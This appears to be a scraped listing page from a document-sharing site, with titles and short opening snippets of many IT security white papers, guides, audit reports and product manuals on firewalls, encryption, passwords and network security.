83-20-10 Secure Data Center Operations Gilbert Held Payoff

83-20-10 Secure Data Center Operations Gilbert Held Payoff 83-20-10 Secure Data Center Operations Gilbert Held Payoff The data center stores information necessary for the effective and efficient operation of the entire organization. Loss of this data, conveyance

More information

RemotelyAnywhere. Security Considerations

RemotelyAnywhere. Security Considerations RemotelyAnywhere Security Considerations Table of Contents Introduction... 3 Microsoft Windows... 3 Default Configuration... 3 Unused Services... 3 Incoming Connections... 4 Default Port Numbers... 4 IP

More information

Cyber Security: Beginners Guide to Firewalls

Cyber Security: Beginners Guide to Firewalls Cyber Security: Beginners Guide to Firewalls A Non-Technical Guide Essential for Business Managers Office Managers Operations Managers This appendix is a supplement to the Cyber Security: Getting Started

More information

ScoMIS Encryption Service

ScoMIS Encryption Service Introduction This guide explains how to implement the ScoMIS Encryption Service for a secondary school. We recommend that the software should be installed onto the laptop by ICT staff; they will then spend

More information

APPENDIX 4 GREATER LONDON AUTHORITY SUN ACCOUNTS UNIX REVIEW FINAL AUDIT REPORT. Auditor: Chris Power & Michael Lacey Date: April 2003 Reference: 320

APPENDIX 4 GREATER LONDON AUTHORITY SUN ACCOUNTS UNIX REVIEW FINAL AUDIT REPORT. Auditor: Chris Power & Michael Lacey Date: April 2003 Reference: 320 APPENDIX 4 GREATER LONDON AUTHORITY SUN ACCOUNTS UNIX REVIEW FINAL AUDIT REPORT Auditor: Chris Power & Michael Lacey Date: April Reference: 320 Table of Contents 1 INTRODUCTION 2 Page 2 OBJECTIVES AND

More information

Network Security: Introduction

Network Security: Introduction Network Security: Introduction 1. Network security models 2. Vulnerabilities, threats and attacks 3. Basic types of attacks 4. Managing network security 1. Network security models Security Security has

More information

Windows Operating Systems. Basic Security

Windows Operating Systems. Basic Security Windows Operating Systems Basic Security Objectives Explain Windows Operating System (OS) common configurations Recognize OS related threats Apply major steps in securing the OS Windows Operating System

More information

Data Access Request Service

Data Access Request Service Data Access Request Service Guidance Notes on Security Version: 4.0 Date: 01/04/2015 1 Copyright 2014, Health and Social Care Information Centre. Introduction This security guidance is for organisations

More information

An Introduction to Network Vulnerability Testing

An Introduction to Network Vulnerability Testing CONTENTS Introduction 3 Penetration Testing Overview 4 Step 1: Defining the Scope 4 Step 2: Performing the Penetration Test 5 Step 3: Reporting and Delivering Results 6 VeriSign SecureTEST 7 Common Vulnerability

More information

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks

More information

1-06-20 Internet Security Using Firewalls Vincent C. Jones

1-06-20 Internet Security Using Firewalls Vincent C. Jones 1-06-20 Internet Security Using Firewalls Vincent C. Jones Payoff Openness has long been the modus operandi on the Internet. Now, as more businesses connect to the Internet as a service to their internal

More information

8 Best Practices for IT Security Compliance

8 Best Practices for IT Security Compliance ROADMAP TO COMPLIANCE ON THE IBM SYSTEM i WHITE PAPER APRIL 2009 Table of Contents Prepare an IT security policy... 4 How are users accessing the system?... 5 How many powerful users are on the system?...

More information

Hang Seng HSBCnet Security. May 2016

Hang Seng HSBCnet Security. May 2016 Hang Seng HSBCnet Security May 2016 1 Security The Bank aims to provide you with a robust, reliable and secure online environment in which to do business. We seek to achieve this through the adoption of

More information

2006-331: PASSWORD AUDITING TOOLS

2006-331: PASSWORD AUDITING TOOLS 2006-331: PASSWORD AUDITING TOOLS Mario Garcia, Texas A&M University-Corpus Christi American Society for Engineering Education, 2006 Page 11.985.1 Password Auditing Tools Abstract A goal of computer system

More information

SECURING YOUR REMOTE DESKTOP CONNECTION

SECURING YOUR REMOTE DESKTOP CONNECTION White Paper SECURING YOUR REMOTE DESKTOP CONNECTION HOW TO PROPERLY SECURE REMOTE ACCESS 2015 SecurityMetrics SECURING YOUR REMOTE DESKTOP CONNECTION 1 SECURING YOUR REMOTE DESKTOP CONNECTION HOW TO PROPERLY

More information

Topics. Virus Protection and Intrusion Detection. What is a Virus? Three related ideas

Topics. Virus Protection and Intrusion Detection. What is a Virus? Three related ideas Virus Protection and Intrusion Detection John Mitchell Topics u Trojans, worms, and viruses u Virus protection Virus scanning methods u Detecting system compromise Tripwire u Detecting system and network

More information

Global Partner Management Notice

Global Partner Management Notice Global Partner Management Notice Subject: Critical Vulnerabilities Identified to Alert Payment System Participants of Data Compromise Trends Dated: May 4, 2009 Announcement: To support compliance with

More information

Management of Hardware Passwords in Think PCs.

Management of Hardware Passwords in Think PCs. Lenovo Corporation March 2009 security white paper Management of Hardware Passwords in Think PCs. Ideas from Lenovo Notebooks and Desktops Workstations and Servers Service and Support Accessories Introduction

More information

PROTECTING NETWORKS WITH FIREWALLS

PROTECTING NETWORKS WITH FIREWALLS 83-10-44 DATA SECURITY MANAGEMENT PROTECTING NETWORKS WITH FIREWALLS Gilbert Held INSIDE Connecting to the Internet; Router Packet Filtering; Firewalls; Address Hiding; Proxy Services; Authentication;

More information

References NYS Office of Cyber Security and Critical Infrastructure Coordination Best Practices and Assessment Tools for the Household

References NYS Office of Cyber Security and Critical Infrastructure Coordination Best Practices and Assessment Tools for the Household This appendix is a supplement to the Cyber Security: Getting Started Guide, a non-technical reference essential for business managers, office managers, and operations managers. This appendix is one of

More information

COB 302 Management Information System (Lesson 8)

COB 302 Management Information System (Lesson 8) COB 302 Management Information System (Lesson 8) Dr. Stanley Wong Macau University of Science and Technology Chapter 13 Security and Ethical Challenges 安 全 與 倫 理 挑 戰 Remarks: Some of the contents in this

More information

WEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project

WEB SECURITY. Oriana Kondakciu 0054118 Software Engineering 4C03 Project WEB SECURITY Oriana Kondakciu 0054118 Software Engineering 4C03 Project The Internet is a collection of networks, in which the web servers construct autonomous systems. The data routing infrastructure

More information

The Trivial Cisco IP Phones Compromise

The Trivial Cisco IP Phones Compromise Security analysis of the implications of deploying Cisco Systems SIP-based IP Phones model 7960 Ofir Arkin Founder The Sys-Security Group ofir@sys-security.com http://www.sys-security.com September 2002

More information

Network Instruments white paper

Network Instruments white paper Network Instruments white paper USING A NETWORK ANALYZER AS A SECURITY TOOL Network Analyzers are designed to watch the network, identify issues and alert administrators of problem scenarios. These features

More information

Division of IT Security Best Practices for Database Management Systems

Division of IT Security Best Practices for Database Management Systems Division of IT Security Best Practices for Database Management Systems 1. Protect Sensitive Data 1.1. Label objects containing or having dedicated access to sensitive data. 1.1.1. All new SCHEMA/DATABASES

More information

SonicWALL PCI 1.1 Implementation Guide

SonicWALL PCI 1.1 Implementation Guide Compliance SonicWALL PCI 1.1 Implementation Guide A PCI Implementation Guide for SonicWALL SonicOS Standard In conjunction with ControlCase, LLC (PCI Council Approved Auditor) SonicWall SonicOS Standard

More information

Chronic Disease Management

Chronic Disease Management RESOURCE AND PATIENT MANAGEMENT SYSTEM Chronic Disease Management (BCDM) Version 1.0 Office of Information Technology (OIT) Division of Information Resource Management Albuquerque, New Mexico Table of

More information

3.5 LAN HDD Enclosure User s Manual

3.5 LAN HDD Enclosure User s Manual 3.5 LAN HDD Enclosure User s Manual NOTE: 1. USB and LAN can t be used at the same time. 2. HDD should be formatted as FAT32. Please check Disk utility section in this manual. 3. For internet FTP usage,

More information

End User Guide to Establishing and Maintaining Connectivity End User Tips for Remote Services Offerings

End User Guide to Establishing and Maintaining Connectivity End User Tips for Remote Services Offerings End User Guide to Establishing and Maintaining Connectivity End User Tips for Remote Services Offerings Table of Contents Introduction...1 Loss of Communications after Service Action...3 Machine Time,

More information

Network Security Policy

Network Security Policy Network Security Policy I. PURPOSE Attacks and security incidents constitute a risk to the University's academic mission. The loss or corruption of data or unauthorized disclosure of information on campus

More information

Cyber Security Beginners Guide to Firewalls A Non-Technical Guide

Cyber Security Beginners Guide to Firewalls A Non-Technical Guide Cyber Security Beginners Guide to Firewalls A Non-Technical Guide Essential for Business Managers Office Managers Operations Managers Multi-State Information Sharing and Analysis Center (MS-ISAC) U.S.

More information

Strong Authentication: Enabling Efficiency and Maximizing Security in Your Microsoft Environment

Strong Authentication: Enabling Efficiency and Maximizing Security in Your Microsoft Environment Strong Authentication: Enabling Efficiency and Maximizing Security in Your Microsoft Environment IIIIII Best Practices www.gemalto.com IIIIII Table of Contents Strong Authentication and Cybercrime... 1

More information

Security Service tools user IDs and passwords

Security Service tools user IDs and passwords System i Security Service tools user IDs and passwords Version 5 Release 4 System i Security Service tools user IDs and passwords Version 5 Release 4 Note Before using this information and the product

More information

ScoMIS Encryption Service

ScoMIS Encryption Service Introduction This guide explains how to install the ScoMIS Encryption Service Software onto a laptop computer. There are three stages to the installation which should be completed in order. The installation

More information

McAfee Endpoint Encryption 7.0 Users Guide and FAQ

McAfee Endpoint Encryption 7.0 Users Guide and FAQ McAfee Endpoint Encryption 7.0 Users Guide and FAQ Table of Contents Introduction... 1 Installation... 1 Boot-Up/Login... 1 Encryption Status... 3 Notes for Encryption... 4 Changing Your Password... 4

More information

FileCloud Security FAQ

FileCloud Security FAQ is currently used by many large organizations including banks, health care organizations, educational institutions and government agencies. Thousands of organizations rely on File- Cloud for their file

More information

Workflow Templates Library

Workflow Templates Library Workflow s Library Table of Contents Intro... 2 Active Directory... 3 Application... 5 Cisco... 7 Database... 8 Excel Automation... 9 Files and Folders... 10 FTP Tasks... 13 Incident Management... 14 Security

More information

WHITE PAPER. An Introduction to Network- Vulnerability Testing

WHITE PAPER. An Introduction to Network- Vulnerability Testing An Introduction to Network- Vulnerability Testing C ONTENTS + Introduction 3 + Penetration-Testing Overview 3 Step 1: Defining the Scope 4 Step 2: Performing the Penetration Test 5 Step 3: Reporting and

More information

Enswitch Administrator Guide

Enswitch Administrator Guide Enswitch Administrator Guide July 2012 Enswitch Administrator Guide 1 Contents 1 Introduction... 5 1.1 The Purpose of this Document...5 1.2 Features...5 1.3 Workflows...5 2 User Enrollment... 6 3 User

More information